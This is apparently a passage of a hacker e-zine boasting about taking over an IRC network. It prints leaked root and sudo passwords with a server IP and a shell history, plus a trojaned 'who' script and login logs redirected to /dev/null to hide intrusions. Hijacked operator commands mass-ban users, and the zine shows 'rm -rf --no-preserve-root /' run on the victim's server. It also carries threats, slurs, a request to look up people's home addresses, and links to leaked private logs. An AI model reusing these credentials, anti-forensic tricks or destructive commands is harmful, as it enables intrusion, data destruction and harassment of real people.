say █ <~bongrip> please dont doubt shit son █ <~bongrip> rofl █ <+ghost> why do you think we sent .raw, we could do it if we actually wanted █ access █ <~bongrip> no █ <~bongrip> you couldnt rofl █ <+ghost> you have said enough in that respect █ <~bongrip> you didnt █ <~bongrip> you didnt know what to do █ <~bongrip> you dont have the first clue as to what you should have put in █ <~bongrip> tell me █ <~bongrip> give me the cmd █ <~MLT> do u not have some antifa demonstrations to be attending █ <~MLT> or furry meetups █ <~bongrip> .!raw what █ <~bongrip> show me █ <~bongrip> rn █ <~bongrip> mr hacker █ <~syn4pse> ^^ █ <~bongrip> ill paste it correctly after you fuck it up █ <~bongrip> noob █ <~MLT> <+ghost> ok just let us know the uname -a when you're done so we can █ tailor the payload for the next link we send you █ <~MLT> >>>>> impyling you have grsec bypass █ <~MLT> lol █ <+ghost> how about !raw run cmd.exe deltree C:\ # fuq1ng wind0ws █ <~bongrip> that wont work bb █ <~bongrip> i can actually run that for you rn █ <~bongrip> and dank wont move a muscle █ <~bongrip> youll see the reply █ <~bongrip> want me to tell you why? █ * syn4pse waits for dank to quit █ <~bongrip> you're a dumbfuck? █ <~bongrip> lol █ <+ghost> i don't because we never wanted some garbage RDP to begin with █ <~bongrip> you could have actually done something █ <~MLT> you wanted access to our ircd █ <+ghost> what would we gain? █ <+ghost> your MIRC license? █ <~MLT> which u failed to obtain █ <~bongrip> the keys to this entire kingdom █ <~bongrip> all the ip's █ <~bongrip> pop shit █ <~bongrip> ddos us █ <~bongrip> make us dump █ <~bongrip> pop tcpdump █ <~bongrip> snort █ <~bongrip> do some thing █ <~bongrip> pop sshd █ <~bongrip> be smart █ <~bongrip> not a dumb fag █ <@Southern_B|tch> 0.o █ <~bongrip> dont come back here after you make mistakes █ <+ghost> ip addresses? like the ones you were logging in #priv8, an open cha █ nnel that was not even +s? █ <~bongrip> and say 'oh we still got you haha' █ <~bongrip> tell me what my ip is to my hub █ <+ghost> you think we don't know the hub ip? █ <~bongrip> what is it █ <~syn4pse> no █ <+ghost> what server am i connected to? █ <~syn4pse> dont tell it i dont want to have to change it █ <+ghost> tell me, bongrip █ <~bongrip> lol at least you got some info passed down to u █ <~bongrip> thats good █ <~bongrip> same pw i had since el8 █ <~bongrip> err █ <~bongrip> domain* █ <~bongrip> only gave one person that, p funny █ <~bongrip> but that person proved to open their mouth about a bunch of thing █ s █ <~bongrip> which im gonna end up dropping info too, and im pretty sure peopl █ e won't like it including you █ <+ghost> which password? █ <+ghost> the one you sent us yesterday? █ <~MLT> rofl told u █ <~MLT> @ bongrip █ <~MLT> who's "us" █ <~MLT> would that be zf0?? █ <~MLT> professional blackhat hacker extraordinaires █ <+ghost> IDENTIFY fuckyehbr0 █ bongrip [rip@undernix.net] has quit [NickServ (GHOST command used by scope)] █ bongrip [rip@A5CC1D30:CAE4151D:95D19DA1:IP] has joined #insecurity █ * mode/#insecurity [+v bongrip] by danK █ <~MLT> lol █ <+scope> <3 █ <@Southern_B|tch> Oh █ <~MLT> lmao █ <+ghost> looks like he still hasn't changed it either, i didn't expect that █ <~MLT> where the oper passes at? █ <+bongrip> lol █ <+bongrip> nice try █ <+bongrip> i used msg nickserv too :P █ <+bongrip> just dug that out of logs did you █ <+bongrip> acting like a hacker again? █ <~MLT> I don't even know my nickserv pass atm so id be surprised if █ they knew it █ <@Southern_B|tch> We suppose to remember them? █ * scope [deploy@53ECE845.87245059.98A7DFBF.IP] has quit [Z:lined (lol i knew █ ur dumbass was a part of it, slut i know who u are so will everyone else █ soon)] █ <~MLT> were they even part of it tho █ <@Southern_B|tch> 0.o █ <~MLT> like tbh i was about to /ns ghost u there █ <~MLT> just to see if it worked █ <~MLT> lol █ <+bongrip> well █ <+bongrip> could be █ <+bongrip> either way █ <+bongrip> lol █ <+bongrip> fuck them for trying █ <~MLT> we need to stop banning like EVERYONE tho lol █ <@Southern_B|tch> I think they just tried it █ <+bongrip> right? █ <~MLT> i guess █ <~MLT> lol █ <~MLT> but █ <+bongrip> illremove it █ <~MLT> i would have done the same █ <+bongrip> i did it for fun tho █ <~MLT> obv someone was gonna try █ <+bongrip> ya █ <+bongrip> tru █ <+bongrip> but i would expect a ban █ <+bongrip> and release █ <+bongrip> just the same █ <~MLT> so did u message ""nickserv"" too/ █ <~MLT> lol █ <@Southern_B|tch> Banning is p lame █ <~MLT> agree █ <+bongrip> ya █ <+bongrip> perm bans are █ <~MLT> unless like cp █ <+bongrip> second bans arent █ <~MLT> or something █ <+bongrip> lol █ <@Southern_B|tch> Why ban people who keep room going █ <@Southern_B|tch> xD █ <+bongrip> making me drop my nick cause this ghost fag likes to save pw's fr █ om when i was gone for 2 days and ircd restarted █ <+bongrip> theres no hack in that █ <+ghost> i agree too █ <+bongrip> lol █ <@Southern_B|tch> Wb █ <+bongrip> what else u got buddy █ <+ghost> why don't you stop being l4m3r █ <+bongrip> anything █ <~MLT> >>typing in leetspeak because I'm a hacker █ <~MLT> where are our oper passes?? █ <~MLT> im srsly disappointed █ <~MLT> in u █ <~MLT> right now █ <+bongrip> ghost █ <@Southern_B|tch> Oh █ <+bongrip> where are we penetrated █ <@Southern_B|tch> Scrolling █ <+bongrip> ive looked high and low █ * ghost [ghost@15808AD9.9D59F381.148B5546.IP] has quit [Quit: keep guessing] █ <@Southern_B|tch> He left █ <+bongrip> lol █ <&sniger> Lmao █ <+dirty> bongrip, inb4 the mail server █ <&sniger> Hax af █ <+bongrip> i was jk █ <~MLT> nothing is owned █ <~MLT> lol █ █ <+bongrip> ive looked high and low █ █ He says he keeps eye on servers and knowing they are secure. █ We check too. █ █ root@zyzz8:~# cat .bash_history █ su (09:06:40) (~chrono_) (23: Result 1: 164.132.228.206 (irc.supernets.org) █ <<< (23: Result 1: 164.132.228.206 (irc.supernets.org) <<< (23: Result 1: 16 █ 4.132.228.206 (irc.supernets.org) <<< (23: Result 1: 164.132.228.206 (irc.su █ pernets.org) <<< (23: Result 1: 164.132.228.206 (irc.supernets.org) <<< (23: █ Result 1: 164.132.228.20605:-58) 05:-58) 05:-58) 05:-58) 05:-58) 05:-58) █ (09:06:41) (~chrono_) (irc.supernets.org) <<< (23: Result 1: 164.132.228.206 █ (irc.supernets.org) <<< (23: Result 1: 164.132.228.206 (irc.supernets.org) < █ << (23: Result 1: 164.132.228.206 (irc.supernets.org) <<< (23: Result 1: 164 █ .132.228.206 (irc.supernets.org) <<< (23: Result 1: 164.132.228.206 (irc.sup █ ernets.org) <<< (23: Result 1:05:-58) 05:-58) 05:-58) 05:-58) 05:-58) 05:-58 █ ) █ who █ whoami █ ls █ ls -lah █ cd /home/ █ ls █ ps aux █ apt-get install build-essential █ apt-get install upgrade █ apt-get install update █ apt-get install update █ apt-get install upgrade █ apt-get update █ apt-get upgrade █ apt-get install build-essential █ apt-get install libssl-dev █ apt-get install fail2ban █ apt-get install psad █ adduser ins3circd █ nano /etc/sudoers █ apt-get install nano █ apt-get install sudo █ nano /etc/sudoers █ su ins3circd █ su ins3circd █ su ins3circd █ cd /home/ins3circd █ ls █ ls -lah █ rm -rf .bashrc █ cp .bashrc2 .bashrc █ su ins3circd █ su ins3circd █ su ins3circd █ su ins3circd █ ls █ who █ ls -lah █ cd /home/ █ ls █ cd ins3circd █ ls █ ps aux █ netstat -an █ who █ ps aux █ kill -9 22694 █ su ins3circd █ cd ins3circd █ cd /home/ █ cd ins3circd/ █ nano unrealircd.conf █ cd Unreal* █ sudo nano unrealircd.conf █ ./unreal rehash █ cat /etc/shadow █ cd /var/ █ ls █ cd log █ ls █ cat messages █ cat faillog █ cat syslog █ ls -lah █ cd ~ █ ls █ ls -lah █ cat .bash_history █ apt-get update █ apt-get upgrade █ cd /home/ins3circd/ █ nano unrealircd.conf █ cd Unreal* █ sudo nano unrealircd.conf █ ./unreal rehash █ exit █ su ins3circd █ exit █ cd /home/ins3circd █ cd Unreal* █ sudo nano unrealircd.conf █ ./unreal rehash █ cd /home/ins3circd/Unreal3.2.10.1/ █ sudo nano unrealircd.conf █ ./unreal rehash █ sudo nano unrealircd.conf █ ./unreal rehash █ █ Lazy strategy: replace /usr/bin/who and log in at different times █ █ root@zyzz8:~# cat /usr/bin/who █ #!/bin/bash █ echo -e "$USER\t`tty|sed s/'\/dev\/'//`\t`date +'%F %H:%M'`\t`echo $SSH_CLIE █ NT | awk '{ print $1}'`" █ root@zyzz8:~# ls -al /var/log/[wb]tmp █ lrwxrwxrwx 1 root root 9 May 27 19:20 /var/log/btmp -> /dev/null █ lrwxrwxrwx 1 root root 9 May 27 08:07 /var/log/wtmp -> /dev/null █ root@zyzz8:~# ls -al /var/log/lastlog █ lrwxrwxrwx 1 root root 9 May 27 19:22 /var/log/lastlog -> /dev/null █ █ Results: Is super effective, bongrip ran ls in /var/ and did not notice the █ symlinks to /dev/null xaxaxaxaxaxa █ █ : APt SUCC3SS : █ █ ███████████████████████████████████████████████████████████████████████████████ ███▓▓▓▒▒▒░░░ 0x06 MD5pedia ███ ███████████████████████████████████████████████████████████████████████████████ █░░ █░ █░ We finding another vuln in dank with wiki module. Western children may be █ surprised, but anyone can edit Wikipedia entries. So we did. █ █ Sadly they removing dank commands after this. We guessing they tired of █ "not getting hacked" over and over again. Goodbye, товарищ. █ █ RIP [zf0]danK █ 2014 - 2017 █ █ GZLINE MLT 0 :by3 █ GZLINE bongrip 0 :w3 ruN th1s n0w █ bongrip has quit (Z:lined (w3 ruN th1s n0w)) █ GZLINE syn4pse 0 :srry h4v3 2 █ syn4pse- has quit (Z:lined (srry h4v3 2)) █ catsik has quit (Z:lined (surprise)) █ syn4pse has quit (Z:lined (srry h4v3 2)) █ loeken has quit (Z:lined (srry h4v3 2)) █ GZLINE RMS 0 :surprise █ RMS has quit (Z:lined (surprise)) █ GZLINE lola 0 :surprise █ lola has quit (Z:lined (surprise)) █ GZLINE loeken 0 :surprise █ GZLINE sxcurity 0 :w3 l0v3 y0u th0ugh █ Zodiac has quit (Z:lined (w3 l0v3 y0u th0ugh)) █ sxcurity has quit (Z:lined (w3 l0v3 y0u th0ugh)) █ dab has quit (Z:lined (w3 l0v3 y0u th0ugh)) █ GZLINE FuZi0N 0 :surprise █ FuZi0N has quit (Z:lined (surprise)) █ skooch has quit (Z:lined (surprise)) █ GZLINE Alyssa 0 :surprise █ Alyssa has quit (Z:lined (surprise)) █ GZLINE komodo 0 :surprise █ PRIVMSG ChanServ :AKICK #noc ADD MLT /dev/null █ PRIVMSG ChanServ :AKICK #noc ADD *@* /dev/null █ PRIVMSG OperServ :SAJOIN swerve #research █ PRIVMSG ChanServ :MODE #insecurity LOCK ADD -QC █ SAJOIN swerve #research █ SAMODE #research +aqo swerve swerve swerve █ PRIVMSG ChanServ :ACCESS #insecurity ADD swerve SOP █ PRIVMSG ChanServ :ACCESS #research ADD swerve SOP █ PRIVMSG HostServ :SET Derp underunix.net █ PRIVMSG HostServ :SET swerve underunix.net █ GLOBAL T1m3 to rM s0m3 sk1ds, n3tw0rk m41nt3n4nc3 █ PRIVMSG OperServ :SET SUPERADMIN ON █ PRIVMSG OperServ :SEEN CLEAR █ PRIVMSG OperServ :SEEN CLEAR 6w █ PRIVMSG OperServ :FORBID ADD MLT :skid lord █ PRIVMSG OperServ :OPERNEWS ADD WE GOT HACKED AGAIN █ PRIVMSG OperServ :GLOBAL g3t r34dy 4 th4 w33klY n3tw0rk m41nt3n4nc3 b1tch3z █ TOPIC #insecurity :PSA b0ngr1p 1z 1mmun3 t0 b31ng h4qd █ danK has changed the topic to: PSA b0ngr1p 1z 1mmun3 t0 b31ng h4qd █ PRIVMSG Global :GLOBAL g3t r34dy 4 th4 w33klY n3tw0rk m41nt3n4nc3 b1tch3z █ MODE #insecurity +aqo swerve swerve swerve █ danK sets mode +aqo on #insecurity swerve █ SAMODE #insecurity +aqo swerve swerve swerve █ TOPIC #research :d1d y0u m1ss uS? █ GZLINE YogSotho 0 :n0 r3funDz 3vr █ YogSotho has quit (Z:lined (n0 r3funDz 3vr)) █ GZLINE dab 0 :pce █ PRIVMSG ChanServ :AKICK #insecurity ADD MLT :w3lc0m3 b4q █ PRIVMSG ChanServ :AKICK #insecurity ADD bongrip :w3lc0m3 b4q █ PRIVMSG ChanServ :DROP #research #research █ PRIVMSG ChanServ :DROP #noc #noc █ GZLINE bongrip 0 :w3 ruN th1z n0w, n3v3r c0m3 b4q █ PRIVMSG BotServ :BOT ADD MLT ci192 vpn02.fbi.gov :skid lord █ PRIVMSG OperServ :NOOP SET superb.underunix.net █ PRIVMSG OperServ :NOOP SET aussie.insecurity.zone █ PRIVMSG OperServ :NOOP SET fsociety.internetz.me █ SAMODE #noc -O █ MODE #noc -O █ MODE #insecurity +q swerve █ GZLINE Jaq4l 0 :by3 █ GZLINE vein 0 :by3 █ GZLINE buttes 0 :bye █ GZLINE xamfp 0 :bye █ GZLINE Southern_B|tch 0 :bye █ k has quit (superb.undernix.net fsociety.internetz.me) █ russian has quit (superb.undernix.net fsociety.internetz.me) █ dezmer has quit (superb.undernix.net fsociety.internetz.me) █ sniger has quit (superb.undernix.net fsociety.internetz.me) █ bitn3ss has quit (superb.undernix.net fsociety.internetz.me) █ kurobeats has quit (superb.undernix.net fsociety.internetz.me) █ tranny has quit (superb.undernix.net fsociety.internetz.me) █ h has quit (superb.undernix.net fsociety.internetz.me) █ FSB has quit (superb.undernix.net fsociety.internetz.me) █ xamfp has quit (superb.undernix.net fsociety.internetz.me) █ cSmith has quit (superb.undernix.net fsociety.internetz.me) █ noproto has quit (superb.undernix.net fsociety.internetz.me) █ w0ne has quit (superb.undernix.net fsociety.internetz.me) █ thom has quit (superb.undernix.net fsociety.internetz.me) █ lilwiz has quit (superb.undernix.net fsociety.internetz.me) █ eight_bytes has quit (superb.undernix.net fsociety.internetz.me) █ anniesbbs has quit (superb.undernix.net fsociety.internetz.me) █ Darkness has quit (superb.undernix.net fsociety.internetz.me) █ dickbutt has quit (superb.undernix.net fsociety.internetz.me) █ Southern_B|tch has quit (superb.undernix.net fsociety.internetz.me) █ Nux has quit (superb.undernix.net fsociety.internetz.me) █ Jaq4l has quit (superb.undernix.net fsociety.internetz.me) █ Nux_ has quit (superb.undernix.net fsociety.internetz.me) █ krazed has quit (superb.undernix.net fsociety.internetz.me) █ sipa has quit (superb.undernix.net fsociety.internetz.me) █ integrity has quit (superb.undernix.net fsociety.internetz.me) █ herpez has quit (superb.undernix.net fsociety.internetz.me) █ hipphopp has quit (superb.undernix.net fsociety.internetz.me) █ fr0zn has quit (superb.undernix.net fsociety.internetz.me) █ ma0u has quit (superb.undernix.net fsociety.internetz.me) █ psycho has quit (superb.undernix.net fsociety.internetz.me) █ deeboi has quit (superb.undernix.net fsociety.internetz.me) █ Conflict has quit (superb.undernix.net fsociety.internetz.me) █ █ ███████████████████████████████████████████████████████████████████████████████ ███▓▓▓▒▒▒░░░ 0x07 Clash of the hashes ███ ███████████████████████████████████████████████████████████████████████████████ █░░ █░ █░ We thought we would help American celebrate their independence day with █ some fireworks. █ █ ok guise █ i know ive been MIA for weeks █ but im gonna make this IRC active as fuck over the course of the next █ few days █ haha wb! █ first off im gonna be expunging some skiddies from our group █ but ill get to that l8r :P █ █ No, let's get to that now. █ █ gb: i am the official root █ bongrip knowing who i am █ you mean like that bitch from person of interest? █ bongrip: is gangster4lyf still being your sudoer password on 139. █ 99.139.120? and h3ll0p00p6654 your root password? i'm thinking not anymore █ * bongrip (Z:lined (no reason)) █ * MLT (Z:lined (no reason)) █ * syn4pse (Z:lined (no reason)) █ * syn4pse- (Z:lined (no reason)) █ * loeken (Z:lined (no reason)) █ * green (root@undernix.net) has joined #insecurity █ * mode/#insecurity [+q green] by green █ * FuZi0N (Z:lined (no reason)) █ * bongrip_ (Z:lined (no reason)) █ * sxcurity (Z:lined (no reason)) █ * Zodiac (Z:lined (no reason)) █ * dab (Z:lined (no reason)) █ * mode/#insecurity [+o danK] by spooky_ █ i came i saw i conquered. fuck being second. i must dominate in █ every thing i do. █ * cSmith (Z:lined (no reason)) █ * Nux (Z:lined (no reason)) █ MLGBT: and i just came █ * Darkness (Z:lined (no reason)) █ * icyphox (Z:lined (no reason)) █ * h (Z:lined (no reason)]) █ * dickbutt (Z:lined (no reason)) █ * mode/#insecurity [+l 47] by danK █ * lilwiz (Z:lined (no reason)) █ * thom (Z:lined (no reason)) █ RIP █ my message is to hack hard, dont be a sad cunt, enjoy life and dont █ take urself 2 seriously. █ * w0ne (Z:lined (no reason)) █ * RMS (Z:lined (no reason)) █ * mode/#insecurity [+l 43] by danK █ * green has changed the topic to: APT █ * M (3e1fc5bb@boats-16B440C8.mibbit.com) has joined █ * M has quit (Z:lined (no reason)) █ * herpez has quit (Z:lined (no reason)) █ * dopE- has quit (Z:lined (no reason)) █ * didi_ has quit (Z:lined (no reason)) █ * smurgle has quit (Z:lined (no reason)) █ * FlappyCuck has quit (Z:lined (no reason)) █ * n0rdi has quit (Z:lined (no reason)) █ * noproto has quit (Z:lined (no reason)) █ * noproto_ has quit (Z:lined (no reason)) █ yes hello, i being oper too now █ * danK sets channel limit to 35 █ * kla has quit (Z:lined (no reason)) █ * spooky_ gives channel operator status to spooky_ █ * installgen2 has quit (Z:lined (no reason)) █ * psycho has quit (Z:lined (no reason)) █ * vein has quit (Z:lined (no reason)) █ * skooch has quit (Z:lined (no reason)) █ * Alyssa has quit (Z:lined (no reason)) █ * anniesbbs has quit (Z:lined (no reason)) █ * M (3e1fc5bb@boats-5AD9868F.mibbit.com) has joined █ * MLGBT gives channel half-operator status to MLGBT █ * FSB has quit (Z:lined (no reason)) █ * rek has quit (Z:lined (no reason)) █ * M has quit (Z:lined (no reason)) █ * danK sets channel limit to 26 █ * MLGBT sets mode +q on #insecurity MLGBT █ * sipa has quit (Z:lined (no reason)) █ * tranny has quit (Z:lined (no reason)) █ * danK sets channel limit to 24 █ * kurobeats has quit (Z:lined (no reason)) █ * danK sets channel limit to 23 █ * jiaolong sets mode +q on #insecurity jiaolong █ * hipphopp has quit (Z:lined (no reason)) █ * danK sets channel limit to 22 █ * Southern_B|tch has quit (Z:lined (no reason)) █ * Atomic_SA284 has quit (Z:lined (no reason)) █ * xamfp_ has quit (Z:lined (no reason)) █ * Jaq4l has quit (Z:lined (no reason)) █ * krazed has quit (Z:lined (no reason)) █ * eight_bytes has quit (Z:lined (no reason)) █ * fatnigger1488 has quit (Z:lined (no reason)) █ * sniger has quit (Z:lined (no reason)) █ ChanServ has quit (superb.undernix.net services.undernix.net) █ █ !raw timer1 0 1 speak i got rooted █ result: - duration: 0 ms █ █ !raw timer 99999 1 exec calc.exe █ danK has quit (Connection reset by peer) █ █ █ █ .''. █ .''. *''* :_\/_: . █ :_\/_: . .:.*_\/_* : /\ : .'.:.'. █ .''.: /\ : _\(/_ ':'* /\ * : '..'. -=:o:=- █ :_\/_:'.:::. /)\*''* .|.* '.\'/.'_\(/_'.':'.' █ : /\ : ::::: '*_\/_* | | -= o =- /)\ ' * █ '..' ':::' * /\ * |'| .'/.\'. '._____ █ * __*..* | | : |. |' .---"| █ _* .-' '-. | | .--'| || | _| | █ .-'| _.| | || '-__ | | | || | █ |' | |. | || | | | | || | █ ___| '-' ' "" '-' '-.' '` |____ █ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ █ █ ssh ins3circd@139.99.139.120 █ ins3circd@139.99.139.120's password: █ █ Linux zyzz8 4.4.59-1-pve #1 SMP PVE 4.4.59-87 (Tue, 25 Apr 2017 09:01:58 +02 █ 00) x86_64 █ █ The programs included with the Debian GNU/Linux system are free software; █ the exact distribution terms for each program are described in the █ individual files in /usr/share/doc/*/copyright. █ █ Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent █ permitted by applicable law. █ ins3circd@zyzz8:~$ sudo su █ [sudo] password for ins3circd: █ root@zyzz8:/home/ins3circd# rm -rf --no-preserve-root / █ [1] 21641 █ rm: cannot remove '/run/shm': Device or resource busy █ rm: cannot remove '/run/lock': Device or resource busy █ rm: cannot remove '/dev/tty2': Device or resource busy █ rm: cannot remove '/dev/tty1': Device or resource busy █ rm: cannot remove '/dev/zero': Device or resource busy █ rm: cannot remove '/dev/urandom': Device or resource busy █ rm: cannot remove '/dev/tty': Device or resource busy █ rm: cannot remove '/dev/random': Device or resource busy █ rm: cannot remove '/dev/null': Device or resource busy █ (..) █ █ so yeah uh █ I need oper on this box █ i also need to speak to lola and ask why the FUCK he wasn't using █ cert-based auth for ssh █ █ ███████████████████████████████████████████████████████████████████████████████ ███▓▓▓▒▒▒░░░ 0x08 Recommended reading ███ ███████████████████████████████████████████████████████████████████████████████ █░░ █░ █░ MLT reassures us MD5 1z CrYpt0grAph1caLLY s3CuR3: █ █ @ret2libc: Well, generally its an issue of speed (making GPU cracking █ highly effective) rather than an issue w/ MD5 being crypto- █ graphically unsound █ █ >>> from hashlib import md5, sha256 █ >>> md5("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a\ █ 3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d8\ █ 49676da0d1555d8360fb5f07fea2".decode("hex")).hexdigest() == █ md5("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a\ █ 3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d8\ █ 49676da0d1d55d8360fb5f07fea2".decode("hex")).hexdigest() █ True █ >>> sha256("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74\ █ a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593\ █ d849676da0d1555d8360fb5f07fea2".decode("hex")).hexdigest() == █ sha256("4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74\ █ a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593\ █ d849676da0d1d55d8360fb5f07fea2".decode("hex")).hexdigest() █ False █ █ █ MLT PRIVMSG sn :yo █ MLT PRIVMSG sn :lemme know when u around █ MLT PRIVMSG sn :i need some UK CACI lookups asap █ MLT PRIVMSG sn :drug deal irl turned sour █ MLT PRIVMSG sn :so i threatened them now they're turning up at my house w/ █ a bunch of people █ MLT PRIVMSG sn :so needing their addresses asap █ MLT PRIVMSG sn :fuckers stole £1k worth of coke from me █ MLT PRIVMSG sn :drove away without paying so i was hanging onto his car █ door punching him in the face while he was speeding up lol █ █ bongrip PRIVMSG MLT :we have a mammoth after us █ bongrip PRIVMSG MLT :someone hired █ bongrip PRIVMSG MLT :someone bigtime █ bongrip PRIVMSG MLT :to hack us █ bongrip PRIVMSG MLT :like someone above el8's head █ bongrip PRIVMSG MLT :above green █ bongrip PRIVMSG MLT :etc █ bongrip PRIVMSG MLT :i dont even know the guys name cause he aliases so █ much █ █ Actually, we taking this job for free. Is a public service. █ █ MLT PRIVMSG bongrip :then who █ bongrip PRIVMSG MLT :positive █ bongrip PRIVMSG MLT :he said hes better than green █ bongrip PRIVMSG MLT :and knows assembly and other shit █ MLT PRIVMSG bongrip :does he have an alias? █ bongrip PRIVMSG MLT :he has tons of aliases █ bongrip PRIVMSG MLT :hes a ghost █ bongrip PRIVMSG MLT :hes just an undergrounder █ MLT PRIVMSG bongrip :no common or frequent ones? █ bongrip PRIVMSG MLT :everyone knows who he is █ bongrip PRIVMSG MLT :but dont really know what to calll him █ bongrip PRIVMSG MLT :cause hes got a new nick █ bongrip PRIVMSG MLT :all the time █ bongrip PRIVMSG MLT :i think hes talking about █ bongrip PRIVMSG MLT :the official █ bongrip PRIVMSG MLT :root █ bongrip PRIVMSG MLT :like the one they allll call █ bongrip PRIVMSG MLT :root █ bongrip PRIVMSG MLT :el8 there was this guy they called root █ bongrip PRIVMSG MLT :that was above all of them █ MLT PRIVMSG bongrip :ah █ bongrip PRIVMSG MLT :and wasnt el8 █ bongrip PRIVMSG MLT :he was for hire █ bongrip PRIVMSG MLT :so someone apparently has gotten this guy █ bongrip PRIVMSG MLT :some money █ bongrip PRIVMSG MLT :to do shit to us █ bongrip PRIVMSG MLT :so like █ bongrip PRIVMSG MLT :dont tcpdump █ █ anyway, yall suck cock. stop posturing as real old school █ hackers. it's getting old. especially people like MLT who go █ "I KNOW AC1DB1TCH3Z!!!!" for attn. yall niggas dunno shit. █ █ <@YogSotho> In my experience, russians are 31337 █ █ he told me he had the box completely locked down and that everything █ was secured █ lola said he had the box secured █ █ kinda makes ya feel like a user/pass mighta been dropped █ by lola █ via a btc █ or 2 █ np █ █ MLT: it was passed on credentials █ scraped some shit and found it, sxcurity :\ █ they didnt hack anything █ sxcurity gave them his sudoers account █ they got mine out of there and the rest is just... █ i mean lol █ weakest unix bowlers █ u know what █ im not even gonna change something █ im gonna leave it as is with them having access to lolas box █ if they can crack that weak ass md5 hash █ and oper up on my accnt █ ill give it to ya █ bongrip I did what? █ @ bongrip ? █ █ @ret2libc: Well we just had a lengthly convo with green about how you and █ some others from 2600 paid him $$$ to try own us. Damn you must █ be desperate. █ █ and green █ lol █ rip █ to him █ and his entire future █ █ r u actually zf0 █ █ ███████████████████████████████████████████████████████████████████████████████ ███▓▓▓▒▒▒░░░ 0x09 Attachments ███ ███████████████████████████████████████████████████████████████████████████████ █░░ █░ █░ [+] PM logs █ https://mega.nz/#!gSoxFYjB!WSi7Fj2WPbN-MoGVv48qb7cY1AaiCvOtBnQTcWpy2Ac █ [+] Unreal patch █ https://mega.nz/#!wCIQ2bgY!67spwHp9nd1g6sbUbuWUcxplcrIYtSOzo5lfd9QTuYs █ █ spread my pm's again and aush0k+kms+zeekill+me at your front door █ ███████████████████████████████████████████████████████████████████████████████ █████████░ ██▀▀▀▀▀█▀ █ ▄█▀█▄ ▄███▄ ▐█ ▐█▌▐████▌ ▄██▄ ▄█▀█▄ ▐████▌ █ ██ ██ ██ ██ ▐██▐█▌ ██ ████ ██ ██ ██ █ ██ ██ ██ ▐████▌ ██ ▐██▐█▌ ██ ██ █ ██ ██ ██ ██ ▐█▌██▌ ██ ▐█████ ██ ██ ██ █ ▀█▄█▀ ▀███▀ ▐█▌ █▌ ██ ██▌ ██ ▀█▄█▀ ██ ██▄▄▄▄▄█▄ █████████ █████████ Please contact us directly through the FSB █████████ █████████ ███▀▀▀▀▐▀ ██ ▄█▀█▄ ████▄ ▄███ ▄███▐████▌██ ▐█ ▐█▌ ▄█▀█▄ ▄███ █▌▐██ ██ ██▌██▌██ ██ ██ ██ ▐██▐█▌▐██ ██ ██▄▄▄ █▌▐█▌▄▄▄ ████▀ ███ ███ ██ ██ ▐████▌▐█▌▄▄▄ ▄▄ ██ █▌▐█▌ ██ ██▌██ ██ ██ ██ ██ ▐█▌██▌▐█▌ ██ ██ ██ ██ ▀█▄██ ██▌▐█▌▀███ ▀███ ██ ██ ▐█▌ █▌ ▀█▄██ ▀███▀ ███▄▄▄▄▄▄ █████████ The OFFICIAL root █████████ Green █████████ danK █████████ █████████ █████████ █████████ ░░ █████████ ░░░░ █████████ ░░░░░░ █████████ █▄ ░░░░░░░░ ████████████████████▄ ░░░░░░░░ ██████████████████████▄ ░░░░░░░ ██████████████████████▀ ░░░░░░░ @ MLT: We're borrowing ████████████████████▀ ░░░ ░░░░░░ your verified checkmark to █▀ ░░░░░░ ░░░░░░ verify the authenticity of ░░░░░░░░ ░░░░░░ this zine. ;) ░░░░░░░░ ░░░░░░ ░░░░░░░░░░░░░ ░░░░░░░░░░ ░░░░░░░